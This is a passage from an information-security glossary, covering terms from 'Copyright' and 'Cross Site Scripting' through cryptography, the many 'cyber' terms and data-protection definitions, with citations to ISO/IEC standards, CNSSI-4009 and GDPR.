intended to prevent or restrict the ability of users to copy or use software and other intellectual property except on the
original authentic
storage media
used for legitimate
distribution.
|
|
Copyright
|
Legal and moral protection giving the creators of original materials intellectual property rights
over the copying, use and dissemination of the information by others with the ability to
permit or prohibit various activities through licenses, contracts or agreements, for decades
(typically 70 years). Aside from being unethical and often illegal, the wanton
or casual abuse of copyright (piracy
and plagiarism)
is a strong disincentive for creatives to continue investing in, creating and
releasing intellectual property.
See also copyleft.
|
|
CORE
IMPACT PRO
|
Costly but well-regarded commercial network security/penetration test tool from CORE
SECURITY. Automates hundreds of exploits against known vulnerabilities.
|
|
Core
network
|
“Part of a mobile telecommunication network that
connects the access network to the wider communication network. The Internet
and other public networks are examples of wider communication networks.” (ISO/IEC 27033-6).
|
|
Corporate
fraud
|
Fraud
committed against a corporation.
|
|
Corporate information security policy
|
Highest-level formal policy stating executive management’s overall position
on information risk
and security e.g. through
a suite of generic principles
and/or axioms. “Document
that describes management direction and support for information security in
accordance with business requirements and relevant laws and regulations.
Note: The document describes the high-level information security requirements
that have to be followed throughout the organisation.” (ISO/IEC 27033-1).
|
|
Correction
|
More or less complete reversal of an error. “Action to eliminate a
detected nonconformity”
(ISO/IEC 27000).
|
|
Corrective
action
|
“Action to eliminate the cause of a nonconformity
and to prevent recurrence” (ISO/IEC 27000).
|
|
Corrective control
|
Form of control
intended to minimize, contain or reverse the damage caused by a security incident, for
example restoring damaged or lost data
from backups or
putting out a fire.
See also preventive
and detective
control.
|
|
Corroborating evidence
|
Evidence
supporting other evidence. May not be directly related to the case e.g. an
alibi supporting someone’s assertion
that they were not present when a crime was committed.
|
|
Corruption,
corrupt
|
Common form of integrity failure e.g. data corruption caused
by malware, bugs and user errors, and human corruption involving coercion, bribery and dubious
ethics.
|
|
COTS
(Commercial Off The Shelf [Software])
|
Refers to standardized as opposed to bespoke software,
typically distributed to the general public in shrink-wrapped packages displaying
generic and non-negotiable license
agreements.
|
|
Counterfeit
|
Pirated,
fake copy misrepresented
as an original, authentic
asset, thereby
infringing the true owner’s
intellectual property rights
and defrauding
the purchaser. Numerous mass-produced counterfeit products and bank notes
are in circulation, some of which are not merely passable but so authentic that even
experts struggle to distinguish them from the genuine articles … although
bargain-basement pricing may be a clue!
|
|
Counterfeiter
|
Fraudster
who counterfeits.
|
|
Counter-Intelligence
(CI)
|
See spying.
See also competitive
intelligence.
|
|
Countermeasure
|
See control.
“Actions, devices, procedures, or techniques that meet or oppose (i.e.,
counters) a threat, a vulnerability, or an attack by eliminating or
preventing it, by minimizing the harm it can cause, or by discovering and
reporting it so that corrective action can be taken.” (CNSSI-4009).
|
|
Counterstrike,
counter-hack
|
Retaliatory attack
directed against the alleged perpetrator of a prior attack. Aside
from escalating tensions and perhaps being illegal, a counterstrike may be
misdirected for instance if the perpetrator was incorrectly identified,
perhaps because the original attack involved spoofing or other covert, coercive or deceptive techniques. A highly risky approach.
|
|
Counterterrorism
|
Government-sponsored activities such as propaganda, intelligence, surveillance
and cybertage,
intended to counteract, undermine, prevent or otherwise mitigate terrorism.
|
|
Cover,
coverage
|
The scope, type or nature of insurance provided, normally defined in
the policy in
terms of events,
perils or hazards, assets
etc. included or excluded, limits of liability plus terms and
conditions.
|
|
Covert
|
Covered. Refers to secretive, hidden, surreptitious,
undercover, quiet or silent activities or devices, generally unauthorized and malicious in nature, such as bugs used for surveillance
or spying. See
also cryptic.
|
|
Covert
channel,
back channel
|
Covert
or cryptic
mechanism allowing confidential
information
to be secretly extracted from a supposedly secure system, network or location (such as a SCIF) bypassing
confidentiality controls,
perhaps using steganography
or out-of-band communications (e.g. manipulating a circuit’s
current demand using specific operating sequences in order to pass
information to an external current-monitoring device). See also backdoor. Cf. side channel.
|
|
Coveware
|
Niche US company offering support services to organisations hit
by ransomware, such
as negotiating ransoms.
|
|
CPNI
(Centre for the Protection of National Infrastructure)
|
UK government security services body responsible for
guidance and advice concerning physical, personnel and information (including cyber) security
arrangements protecting critical
national infrastructure.
|
|
CPTED
(Crime Prevention Through Environmental Design)
|
Physical
architectural design
philosophy that seeks to deter
attacks by
criminals against people innocently using shopping malls, railway stations,
walkways between parking lots and buildings etc. For example, even
lighting and landscaped areas free of hidey-holes permit more effective surveillance monitoring and
escape routes for potential victims,
while barriers and visual cues distinguish private from public property. Thorny bushes near
windows and walls, and razor
wire deter casual if not professional intruders.
|
|
Crack,
cracker, cracking
|
Malicious
hacker or
criminal, generally motivated by the prospect of personal gain. Passwords, cryptosystems
and safes may be
cracked, for example by brute
force attacks.
|
|
Crash
|
Unplanned sudden computer system or device failure resulting from an
unhandled exception/error condition
triggered accidentally
by a bug, power
glitch etc. or deliberately by a hack or malware.
|
|
Crash
dump
|
File containing a snapshot of the contents of main memory
at the time of a crash.
Used by systems
programmers to analyse the status of the stack, heap, registers, buffers,
pointers etc. in an attempt to discover what caused the crash. Used
by hackers to
find confidential
information
such as passwords
and encryption
keys that had been
held temporarily in memory. Used by malware analysts to identify cryptic malware.
|
|
Creative Commons
(CC)
|
A not-for-profit organisation promoting free access to and use of
intellectual property
as in copyleft.
Their standardized licenses
cater for various situations ranging from placing information unencumbered into the public domain, through
requiring attribution
of the owner, to
restrictions on commercial use and modification.
|
|
Credential
|
Something a person, system etc. presents to confirm (authenticate)
their asserted
identity (e.g. a
passport, password,
security token
or digital certificate)
or professional capabilities (e.g. résumé or curriculum
vitae plus the original, authentic education and training certificates).
|
|
Credential stuffing
|
Automated brute-force
attack involving
attempting to logon
to multiple websites using lists of usernames, passwords and other credentials accumulated from other
sources, such as previous hacks.
If a logon succeeds (proving the credentials valid), further information may be obtained from the compromised
account, perhaps leading to direct exploitation and further compromises (identity fraud).
|
|
Credible
|
Believable. Social engineers and fraudsters work hard to make their pretexts
credible in order to fool their targets
into trusting them
inappropriately.
|
|
Crenelated
|
Classic ╓┐_╓┐_╓┐_╓┐_╓┐ shaped
tops to the battlements
of Mediaeval castles. Archers cowered behind the uprights for protection while
raining down arrows upon the attackers
below through the gaps. An ancient physical security control.
|
|
CREST
|
UK-based government-supported not-for-profit organisation
and scheme to test and accredit
penetration testers.
Given the trusted,
privileged
nature of the work, testers must be competent in order for their clients to
place any reliance on their assurance
efforts, and must be trustworthy
since they may gain access
to valuable and/or confidential
information assets
if (when!) tested security
controls fail. See also CBEST.
|
|
Crib
|
Useful hint for a cryptanalyst, often consisting of some known plaintext
that, for example, will reveal if the correct decryption key has been found by a brute force attack on the cyphertext.
Standard or routine parts of a message (such as a date/time stamp,
predictable sequence number, message type or protocol identifier, greeting or
signature) may be useful cribs.
|
|
Crimeware,
crimeware kit,
attack toolkit,
exploit kit
|
Software
package used to generate and/or distribute malware using libraries of technical exploits, plus the infection and remote-control
elements including functions to report statistics on the status of the
exploitation process.
A few crimeware kits (such as Carberp
and Zeus) have been
released onto the Internet.
Some are traded commercially on the black market or hacker underground. Most are
jealously guarded by the hackers
who created and maintain them and/or the criminals who pay for and exploit
them.
|
|
Criminal underground
|
See black
market. See also hacker underground.
|
|
Crisis
|
Chaotic situation immediately following a serious incident,
characterized by disorder and panic. Survival (of people if not the organisation)
is generally the overriding priority in a crisis, hence all other
considerations (including security)
tend to be disregarded until the crisis subsides.
|
|
Crisis
management
|
Management
activities during a crisis
such as evacuating buildings, calling the emergency services, triage and
initiating incident
management activities as order is gradually restored.
|
|
Critical National
Infrastructure (CNI),
Critical Corporate Infrastructure (CCI),
Critical Infrastructure (CI)
|
Shared infrastructure services and supplies, such as
electricity, water, fuel, food, telecommunications, government, law enforcement,
armed services and the security services, that are considered vital for a
nation (CNI) or organisation
(CCI). Significant failure of any of these, perhaps as a result of a physical
or electronic attack
on the ICT
equipment, networks,
things or
people monitoring
and controlling
them, is likely to cause immediate disruption and substantial economic damage
as well as perhaps causing injuries, deaths, environmental incidents etc., making these
attractive targets
in cyberwarfare.
|
|
Cross border processing
|
“Either (a) processing of personal data which takes
place in the context of the activities of establishments in more than one
Member State of a controller or processor in the Union where the
controller or processor is established in more than one Member State; or
(b) processing of personal data which takes place in the context of the
activities of a single establishment of a controller or processor in the
Union but which substantially affects or is likely to substantially affect
data subjects in more than one Member State” (GDPR).
|
|
Cross
Site Scripting,
“XSS”
|
Web hacking
technique in which badly-designed
websites (e.g. some bulletin-board systems) with inadequate data entry validation are made to return malicious URLs,
HTML, JavaScript or other executable code (malware) to the user’s browser for execution (e.g. to manipulate
or disclose their supposedly private cookies or other local data). [Denoted
“XSS” to avoid being confused with Cascading Style Sheets.]
A form of code
injection. See also XXE.
|
|
Crossover Error
Rate
(CER)
|
In authentication
systems, the
tolerance or sensitivity configuration set point at which false rejections
are just as likely as false
acceptances.
|
|
Cryptanalysis,
cryptanalyst,
cryptanalytic
|
Study and practice of breaking cryptosystems by any means, normally
through a combination of mathematics, language analysis, brilliant intuition,
lots of time, powerful computers and sheer hard work. The cryptanalyst may
attempt to find and exploit
mathematical or technical weaknesses in the algorithm and/or the system and processes that implement it, guess the
key by brute force,
or somehow disentangle the relationships between known plaintext such as a crib and the corresponding cyphertext.
|
|
Cryptic
|
Surreptitious, deliberately hidden, secretive, concealed
or non-obvious, such as a fiendishly difficult crossword puzzle. Not
necessarily unauthorized
or malicious.
See also covert.
|
|
Cryptocurrency
|
Tradeable virtual currency such as Bitcoin and Litecoin.
Protected against counterfeiting
by cryptographic
means including blockchain.
Generated by cryptomining.
|
|
Cryptogram
|
See cyphertext.
|
|
Cryptographic erase
|
With various important provisos concerning the level of risk,
overall process, technology, algorithm,
key length and complexity
etc., encrypting
data or perhaps
overwriting it with cyphertext,
and then destroying the key, may render confidential information ‘permanently’ irretrievable.
“Method of sanitization in which the encryption key for the encrypted
target data is sanitized, making recovery of the decrypted target data
infeasible” (ISO/IEC
27040).
|
|
Cryptographic
module
|
Tamper-resistant
computer subsystem consisting of data
processing, storage and
communications hardware
and firmware, designed to perform cryptographic
operations such as receiving, encrypting
and returning a nonce
using a private key
in a challenge-response
authentication
scenario.
|
|
Cryptography,
cryptographic,
crypto
|
From the Greek words for “hidden” and “writing”, the
science, study and practice of creating systems to hide information and to find and retrieve it
when needed. Involves the use of mathematical algorithms for encryption, hashing, authentication etc.
|
|
Cryptographic protocol
|
Specified algorithms,
parameters (such as key
length) and processes
for establishing, using and managing cryptographic authentication, encryption etc. “An agreed standard
for secure communication between two or more entities” (NZ information Security Manual).
|
|
Cryptographic system
|
“A related set of hardware or software used for cryptographic
communication, processing or storage, and the administrative framework in
which it operates” (NZ information Security Manual).
|
|
Cryptographic system material
|
“Material that includes, but is not limited to, key,
equipment, devices, documents and firmware or software that embodies or
describes cryptographic logic” (NZ information Security Manual).
|
|
CryptoLocker
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
|
Cryptology,
crypto
|
Literally, the study of ‘hidden writing’ which encompasses
both cryptography
and cryptanalysis.
Confusingly also sometimes abbreviated to ‘crypto’.
|
|
Cryptominer,
cryptomining,
cryptojacking
|
Application that attempts to generate
and/or validate
new cryptocurrency,
consuming significant computer resources (particularly the graphics
processor) and power in the process. Along with spyware, identity fraud, intellectual
property theft and coercion
(ransomware),
cryptomining is a way for criminals to make money from malware-infected systems without their owners’ knowledge and consent.
|
|
Cryptonym
|
An innocuous code-name assigned to a project, assignment,
system, individual, organisation, incident etc. to reduce the possibility of
disclosing sensitive
information.
|
|
Cryptoperiod
|
“The useful life of the cryptographic key” (NZ information Security Manual).
|
|
Cryptoprimitive,
cryptographic primitive
|
See cryptographic
algorithm.
|
|
Cryptorbit
|
A species
of ransomware
in the wild in
2016.
|
|
Cryptosystem
|
Computer system
or device that
employs cryptography.
Generally taken to include the cryptographic
algorithm, the
key management processes, external
interfaces, software
supporting operations and sometimes even the entire PKI.
|
|
Cryptovariable
|
See key.
|
|
Cryptowall
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
|
CryptXXX
|
A species
of ransomware
in the wild. Flaws in the cryptosystem
implementation substantially weakened this malware.
|
|
Cryzip
|
One of the earliest
species of data-encrypting ransomware, in the wild in 2006.
|
|
CS
(Control Strength)
|
One of the parameters in the FAIR method, CS estimates the ability for
controls to
mitigate risks
(actually, to ‘reduce vulnerabilities’
in FAIR terms) to information
assets under analysis. Strong controls are well designed, fully implemented, highly
effective, robust/resilient,
unlikely to be bypassed/disabled, used, managed, maintained etc. See
also PLM, LEF, TCap and TEF.
|
|
CSA
(Cloud Security Alliance)
|
Industry body for CSPs
and their customers, promoting good practices in the information security, privacy and risk aspects of cloud computing. Cf. Control Self-Assessment.
|
|
CSE
(Communications Security Establishment)
|
Canada’s techno-spooks,
whose mission is to “provide and protect information of [Canadian] national
interest through leading-edge technology”. Responsible for SIGINT, surveillance etc.
|
|
CSF
(Cyber Security Framework)
|
See NIST CSF.
|
|
CSIS
(Canadian Security Intelligence Service)
|
Canada’s national intelligence agency.
|
|
CSP
(Cloud Service Provider)
|
An organisation
offering cloud
computing services, usually on a commercial basis.
|
|
CSP
(Content Security Policy)
|
Instructions in the HTML header concerning what the
browser should or should not do with content from an appropriately-coded web
page – for example, not loading or interpreting third party files containing
JavaScript, ActiveX,
fonts etc. that might be used for XSS or other code injection attacks on the browser. An exception allows
browser plug-ins to override the CSP, though, which is a vulnerability.
However, the presence of malicious
plug-ins on a system
may indicate more significant issues.
|
|
CSR
(Corporate Social Responsibility),
corporate sustainability, conscience or citizenship, sustainable or
responsible business,
conscious capitalism
|
An emerging form of organisational self-regulation intended
for organisations to be seen to achieve wider social and ethical objectives, in
addition to conventional (capitalist, competitive, profit-driven) business
objectives. In the information
security context, CSR typically concerns privacy and integrity, for example not intrusively
capturing and exploiting
personal
information about workers
and third parties, and overtly supporting the Internet rather than merely using it.
|
|
CTB-locker
|
One of several nasty species of ransomware in the wild that surreptitiously and
strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys.
|
|
CTF
(Capture The Flag)
|
Simulation of an attack, or a planned campaign consisting of multiple
attacks, on an organisation
or its sites, networks,
IT systems or
parts thereof, in which the side on the offensive (commonly called the red team) attempt
to place markers (such as fake
bombs) and/or retrieve pre-designated information (the flags) to prove that
they largely or completely defeated the defenders (the blue team). See also purple team.
|
|
CUI
(Controlled Unclassified Information)
|
US government term for unclassified information that nevertheless requires
some degree of protection,
typically for legal compliance
reasons (e.g. privacy).
Structured into categories such as critical infrastructure; defense; export
control; financial etc. Intended to replace myriad similar terms
(such as SBU and FOUO) now
officially deprecated.
|
|
Custodian
|
Temporary/surrogate owner who takes possession of, and is reasonably
expected to care for and protect, an information asset, acting on behalf and
in the best interests of its true owner. “Person or entity that has
custody, ownership, control or possession of Electronically Stored
Information” (ISO/IEC
27050-1).
|
|
CVE
(Common Vulnerabilities and Exposures)
|
MITRE’s original reference database of known software security vulnerabilities. See cve.mitre.org
and CWE.
|
|
CVV (Card Verification
Value), CVV2 (2nd generation CVV),
CSC (Card Security Code),
CAV (Card Authentication Value),
CAV2 (2nd generation CAV),
CVC (Card Validation Code), CVC2 (2nd generation CVC), CID (Card Identification
Number)
|
A value encoded on the magnetic stripe or a 3 or 4-digit
decimal number normally printed rather than embossed on a credit/debit/bank
card, that can be used to verify the card number. According to PCI-DSS, the value must
not be stored by a merchant: after it has been used to validate the
card number, it should be erased from memory so that if the merchant’s systems are ever compromised by crackers, they will
not gain the fullz
… provided they haven’t installed their own data monitoring/logging software to
capture the data in transit or during processing.
|
|
CWE
(Common Weakness Enumeration)
|
MITRE’s community-developed dictionary of commonplace
types or classes of software
security vulnerabilities.
Grew out of the CVE.
See cwe.mitre.org.
|
|
Cyber
|
Originally coined as a mathematical term, it evolved to
mean governance
and control, and
latterly computing and related ICT,
particularly the Internet.
A jargon prefix/buzz-word, much abused by marketers, journalists, politicians
etc. and widely misinterpreted. Inconsistently hyphenated-too.
Prefixed “cyber”, almost any term appears hi-tech and novel whereas in
fact most are old hat.
|
|
Cyber-Armageddon,
cybergeddon
|
A full-blown unrestrained cyberwar between highly capable and
well-resourced nations or groups would undoubtedly inflict devastating
economic damage with horrendous social consequences on a global scale,
analogous to the nuclear weapons posturing and threats of MAD (Mutually-Assured
Destruction) during the Cold War.
|
|
Cyberattack,
cyber attack,
cyber-attack
|
An attack
staged primarily through electronic means, particularly through the Internet. “An
attack, via cyberspace, targeting an enterprise’s use of cyberspace for the
purpose of disrupting, disabling, destroying, or maliciously controlling a
computing environment/infrastructure; or destroying the integrity of the data
or stealing controlled information” (CNSSI-4009).
“Malicious attempts to exploit vulnerabilities in information systems or
physical systems in cyberspace and to damage, disrupt or gain unauthorized
access to these systems” (ISO/IEC
27100 [draft]).
|
|
Cyberbully
|
Someone who uses social media, email etc. to harass, intimidate, threaten, coerce and/or traumatize victims.
|
|
Cyber
command
|
Military command center for cyber operations, such as the US Cyber
Command reportedly based at Fort Meade, Maryland.
|
|
Cybercrime
|
The commission of criminal acts in cyberspace. More informally, the use or exploitation of ICT and/or the Internet to
commit crime.
|
|
Cybercrook,
cybercriminal
|
Someone who uses IT systems and networks (particularly the Internet) to commit crime.
|
|
Cyberespionage,
cyberspying
|
Use of IT
systems and networks
(particularly the Internet)
to spy on targets.
|
|
Cyber-extortion
|
Criminal exploitation of illegitimate access to and control over sensitive and/or valuable information in order to coerce victims out of money etc. Attacks
typically involve the use of hacking, malware (e.g. ransomware),
theft of data storage media or ICT devices, and/or social
engineering. See also extortion.
|
|
Cyber
harassment
|
Harassment or coercion conducted through the Internet, generally, such as revenge porn and spam bombing.
|
|
Cyber
incident
|
Information security incident involving ICT. “Actions taken through the use of computer
networks that result in an actual or potentially adverse effect on an
information system and/or the information residing therein. See incident.” (CNSSI-4009).
|
|
Cyberinfrastructure
|
The ICT
elements of global, national or corporate infrastructures, especially
automated systems
interconnected through networks
such as the Internet.
|
|
Cyberinsurance,
cyber insurance, cyber risk insurance
|
Insurance against specified cyber-risks, a form of risk sharing.
|
|
Cyber
persona
|
“Digital representation of an individual or organisation
necessary to interact in cyberspace” (ISO/IEC 27101 draft).
|
|
Cyber-prepping
|
Preparing to survive cyberwar or extreme cyber incidents
including post-apocalyptic social disorder and infrastructural collapse.
|
|
Cyberpunk
|
(a) A science fiction genre characterized by classic
futuristic ICT works
such as William Gibson’s Neuromancer. (b) A proudly nonconformist anti-establishment
youth with a deep fascination for the cyber world and hacking plus, often, piercings, tattoos
and a curious obsession with black clothing.
|
|
Cyber
resilience
|
Resilience,
robustness and stability of the cyberinfrastructure. “The ability of
an organisation to continue to carry out its mission by anticipating and
adapting to cyber threats and other relevant changes in the environment and
by withstanding, containing and rapidly recovering from cyber incidents”
(Financial Stability Board Cyber Lexicon, November 2018).
|
|
Cyber-risk,
cyber risk,
cyberrisk
|
Potentially damaging or harmful situation involving data, ICT, networking etc., particularly
deliberate attacks
by hackers, extortionists,
criminals, social
engineers, fraudsters,
terrorists or other competent adversaries.
|
|
Cybersecurity,
cyber-security,
cyber security
|
Primarily refers to technical/ICT security controls protecting computer systems, networks and the associated data, in other words IT security.
However, the definition is sometimes widened to include information security as a whole, while
some narrow it to refer to defensive measures within cyberwarfare, Internet security,
critical [national] infrastructure
security, and/or securing virtual worlds. Caveat lector. “The
ability to protect or defend the use of cyberspace from cyber attacks” (CNSSI-4009).
“The process of protecting information by preventing, detecting, and
responding to attacks” (NIST Cybersecurity Framework).
“Includes any processes, practices or technologies that organisations have in
place to secure their networks, computers, programs or the data they hold
from damage, attack or unauthorised access." (UK Government Department
for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2018: Technical Annex).
|
|
Cybersecurity framework
|
“Basic set of concepts used to organise and communicate
cybersecurity activities” (ISO/IEC 27101 draft).
|
|
Cyberspace
|
Vague term, not yet consistently defined, used and
understood, typically referring vaguely to ICT, particularly the Internet, and sometimes Internet
culture, virtual
systems, virtual worlds, collaborative working, social media etc.
“A global domain within the information environment consisting of the
interdependent network of information systems infrastructures including the
Internet, telecommunications networks, computer systems, and embedded
processors and controllers” (CNSSI-4009).
|
|
Cybersquatting
|
Illicit exploitation
and misappropriation of commercial trademarks in the cyber/ICT context, for example, using copycat
or lookalike domain names or URLs for phishing, fraud or other attacks. See also typosquatting.
|
|
Cyber
stalking
|
Grooming or snooping on victims through the Internet, generally, typically
continuing to contact and coerce
them after being asked or told to desist.
|
|
Cyberstrike
|
An attack
in, on or through cyberspace.
|
|
Cybertage
|
Sabotage
in cyberspace
that compromises
IT systems/devices, databases, networks, data or information e.g. destroys or
damages them, interrupts or delays business activities, or leads to the loss
of valuable business or the inappropriate disclosure of confidential information. Whereas
sabotage usually implies inflicting physical damage (such as arson), cybertage
often affects intangible information
assets (e.g. using malware such as ransomware).
|
|
Cyberterrorism
|
The commission of terrorist acts in cyberspace. More informally, the use or exploitation of ICT to commit
terrorism.
|
|
Cyberteur
|
Person who commits cybertage, such as a mole.
|
|
Cyberthreat
|
Threat
or threat agent
active in the cybersecurity
domain - particularly substantial, highly capable ones backed by governments
and other resourceful and determined adversaries.
|
|
Cyber-vandalism
|
Computer-enabled wanton damage, or wanton damage of
computers.
|
|
Cyber-vigilante
|
Person who uses hacking,
malware, social engineering
etc. to further a malicious
personal agenda or obsession.
|
|
Cyberwar,
cyber-war,
cyber war,
cyberwarfare,
information warfare
|
The deliberate exploitation
of vulnerabilities
in an adversary’s
computing and telecommunications capabilities, networks etc. by a nation state as
an act of war intended to disrupt vital parts or the entirety of their critical [national] infrastructure,
disable their national defences
and offensive
capabilities, inflict crippling economic damage etc. Due to
exclusions in the small print for ‘acts of war’, incidents classed as
cyberwar attacks may not be covered by cyberinsurance. See also cyber-Armageddon.
|
|
Cyberweapon
|
Tool or technique (such as a computer, malware, hacking, social engineering, cybertage, spying, coercion or EMP weapon) capable of being used
offensively to attack
an adversary’s
critical infrastructure
as part of cyberwar
or a similar military mission, and/or to defend against such attacks.
|
|
CybOX
(Cyber Observable eXpression)
|
A schema for specifying, capturing, characterizing and
communicating/sharing IT
system and network
events and
properties for event management and logging,
malware
characterisation, intrusion
detection/prevention,
incident response
and digital
forensics. See also STIX
and TAXII.
|
|
Cylinder
lock
|
The most common form of physical lock, used on many front doors. When
someone inserts the correct key
into the keyway,
internal pins are lifted to exactly the right positions to allow the plug to be rotated in
the hull, thereby
retracting the latch so the door can be opened.
|
|
Cynefin
framework
|
A framework
or conceptual model concerning situations or systems that are described as simple
(stable and predictable), complicated (largely predictable through
cause-and-effect relationships), complex (largely unpredictable,
linkages rationalized only after the fact), chaotic (inherently
unstable and unpredictable) or disordered (of unknown status).
Different modes of thinking, controlling
or directing, planning and responding are appropriate in each case.
|
|
Cypher-
|
An archaic British spelling of cipher that, paradoxically, is used in
some modern compound words concerning cryptography. See algorithm.
|
|
Cyphertext,
cryptogram
|
Unintelligible string such as
HbAaKhBsaao)X]*AX551&*S66 that makes no sense to a human reader but which
can be transformed back into the corresponding plaintext using the correct cryptographic algorithm/s and encryption key/s.
|
|
Darknet,
Darkweb,
dark Web, invisible Web, hidden Web
|
Covert
and illicit part of the deep
Web offering criminal/black market services and tools such as hacking, RaaS, money laundering
and illegal drugs. Aside from blocking or evading search engine spiders,
Darkweb sites and apps
may exploit
novel protocols
making them inaccessible to users
who lack the requisite access
authority, knowledge,
keys and/or tools.
|
|
Dash[board] cam[era],
dashcam
|
CCTV camera mounted in or on a vehicle (not necessarily
literally on the dashboard) to record traffic incidents, bad driving, road rage, accidents etc.
A form of surveillance.
See also body cam.
|
|
DAST
(Dynamic Application
Security Testing)
|
In effect, penetration
testing of an application,
checking (from the network
perspective) whether its exposed ports and services have known vulnerabilities.
See also SAST and IAST.
|
|
Data
|
Electronic representations of information within a computer system or network. In
digital computers, data (and indeed software) consists of sequences of
logical ones and zeroes known as bits. Strictly speaking, data is the plural
of “datum” but it is widely used in the singular. “Collection of values
assigned to base measures, derived measures and/or indicators. Note: this
definition applies only within the context of ISO/IEC 27004:2009” (ISO/IEC
15939:2007).
|
|
Data Analytics
(DA)
|
Fancy marketing term for the common-or-garden study and
analysis of data.
Typically involves the use of statistics to examine and glean useful information
from large data sets, also known as big data.
|
|
Data
at rest
|
Digital bits-n-bytes taking a well-earned break from the
daily grind? Alternatively, “Data stored on stable non-volatile storage”
(ISO/IEC 27040).
“Information residing on media or a system that is not powered or is
unauthenticated to” (NZ information Security Manual).
Cf. data in motion.
|
|
Database
(db)
|
Structured and managed collection of data. The structure and accumulation of
data, along with the software
functions to manage, manipulate and report them, usually make databases far
more valuable than plain, unmanaged ‘flat files’ or simple lists and tables.
The most important computer systems
often are databases, making database security controls such as those protecting data integrity a
vital part of information
security.
|
|
DataBase
Administrator
(DBA)
|
Privileged
user who administers (manages) databases. Normally responsible for
running the DBMS,
configuring, maintaining and tuning databases e.g. setting up user rôles and
defining their access
rights to tables and cells, monitoring security logs etc.
|
|
Data
breach
|
A breach
involving data. “Compromise
of security that leads to the accidental or unlawful destruction, loss,
alteration, unauthorized disclosure of, or access to protected data
transmitted, stored or otherwise processed” (ISO/IEC 27040).
|
|
Data concerning health
|
“Personal data related to the physical or mental health
of a natural person, including the provision of health care services, which
reveal information about his or her health status” (GDPR). See also PHI.
|
|
Data
controller
|
The organisation
or person gathering, holding and using personal information, responsible for
ensuring it is adequately secured in order to protect the data subjects’ privacy. Accountable for securing the information,
even if it is processed by a separate organisation (a data processor).
|
|
Data
dictionary
|
Formal description of the data fields of records in a database, ideally including their information security
characteristics.
|
|
Data
in motion
|
Digital bits-n-bytes on the move, jiggling about,
steadfastly refusing to stay still and be counted? Alternatively, “Data
being transferred from one location to another. Note: These transfers
typically involve interfaces that are accessible and do not include internal
transfers (i.e., never exposed to outside of an interface, chip, or device)”
(ISO/IEC 27040).
Cf. data at
rest.
|
|
Data
in transit
|
“Information that is being conveyed across a
communication medium” (NZ information Security Manual).
See also data in motion.
|
|
Data
in use
|
Data
currently being processed.
“Information that has been decrypted for processing by a system” (NZ information Security Manual).
|
|
Data
miner
|
Form of malware
that covertly
collects information
on web users, for
example secretly recording personal information submitted by users
of online forms.
|
|
Data
objects
|
“Elements which contain PII. Example: such elements
are for instance files, documents, records or attributes. Concrete data
objects may be e.g. invoices, contracts, personal files, visitor lists,
personnel planning sheets, user accounts, log entries, consent documents, and
so on. Note: Data objects can be combined with other data objects in a
cluster of PII. The individual data object can be of varying complexity.” (ISO/IEC 27555
draft).
|
|
Data
spill
|
“An information security incident that occurs when
information is transferred between two security domains by an unauthorised
means. This can include from a classified network to a less classified
network or between two areas with different need-to-know requirements” (NZ information Security Manual).
|
|
Data Processing
(DP)
|
Prehistoric term for what is now commonly known as the ICT
function/department/team or simply “IT”.
|
|
Data
processor
|
An organisation
that processes personal
information on behalf of another (the data controller). Typically, an ICT or cloud computing
services company.
|
|
Data protection
|
See information protection.
|
|
Data Protection Directive
|
“Directive 95/46/EC of the European Parliament and of
the Council on the protection of individuals with regard to the processing of
personal data and on the free movement of such data” which sought to
harmonize information
protection or privacy
laws across the European Union and further afield (e.g. Australia,
Canada and New Zealand). Being replaced by GDPR.
|
|
Data
remanence
|
“Residual information remaining on a device or storage
media after clearing or sanitising the device or media. Sometimes described
as data persistence” (NZ information Security Manual).
See also remanence.
|
|
Data security
|
See IT
security.
|
|
Datasploit
|
Application
supporting both offense
using, and defences
against, social
engineering attacks.
Mines open source
intelligence sources and correlates information on individuals,
domains, email
addresses, phone numbers etc. An example of dual-use technology, popular with black-, grey- and white-hats. See
also Burp suite and
Maltego.
|
|
Data stealing/thieving/theft malware
|
Malware
that surreptitiously harvests and exfiltrates valuable proprietary information or personal
information from infected
systems and networks to be exploited directly
or sold on the black
market.
|
|
Data
subject
|
The person whose personal information it is.
|
|
DBMS
(DataBase
Management System)
|
Specialized software
system supporting
database applications. Provides
management
functions to organise data
(usually in the form of tables, matrices, lists or sets) and data security (e.g. enforcing
referential
integrity). Provides a standardized interface or abstraction layer
between the application and the underlying operating system and hardware. Heavily optimized for
performance and throughput, for example caching frequently-accessed data to
reduce disk reads. Cf. management system (in the ISO sense).
|
|
DCS
(Distributed [or
Digital] Control System)
|
Originally a term for a process control computer system that uses digital computer
technology rather than analogue electro-mechanical controls. Latterly used
to denote SCADA-like
ICS distributed
around the plant and operating semi-autonomously.
|
|
DCU
(Data Collection
Unit),
pod
|
Network
node or thing
that gathers data
from other things such as distributed sensors, smart meters etc. and forwards it
to a central system,
passing commands in the opposite direction. Used in ICS/SCADA, IIoT
and IoT.
|
|
DDoS
(Distributed Denial of Service)
|
Type of DoS attack using numerous attacking systems (typically bots) to generate large
volumes of network
traffic, thereby flooding and possibly swamping (overloading) the target systems or network,
causing them to stop providing ICT
services. See also DRDoS.
|
|
DEA
(Data Encryption
Algorithm)
|
Symmetric
encryption algorithm
specified in FIPS PUB 46 in 1977 for the Data Encryption Standard DES.
|
|
Dead drop
|
See drop.
|
|
Dead Letter Box (DLB)
|
See drop.
|
|
Dead
double
|
Identity
thief who assumes the identity
of a dead person.
|
|
Deception,
deceit
|
Lying, lie, fabrication or deliberate, manipulative
concealment of the truth.
|
|
Deception
technology
|
[Marketing] term for advanced honeypot systems designed to lure, divert, contain
and gather information
(intelligence)
on hackers inside
corporate networks,
all the while deceiving them into believing they are genuinely gathering reconnaissance,
exploiting vulnerabilities
and capturing flags.
A potentially valuable approach in some circumstances, but potentially costly
and risky too (e.g. distracting,
diverting and misleading cybersecurity
resources while engendering a false sense of security).
|
|
Decision
criteria
|
“Thresholds, targets, or patterns used to determine the
need for action or further investigation, or to describe the level of
confidence in a given result” (ISO/IEC 15939:2007).
|
|
Declassification
|
The authorized
removal or downgrading of classification
level on information
for which the current class is no longer appropriate (e.g. outdated,
irrelevant or already disclosed),
thereby increasing permitted
access. “A
process whereby information is reduced to an unclassified state and an
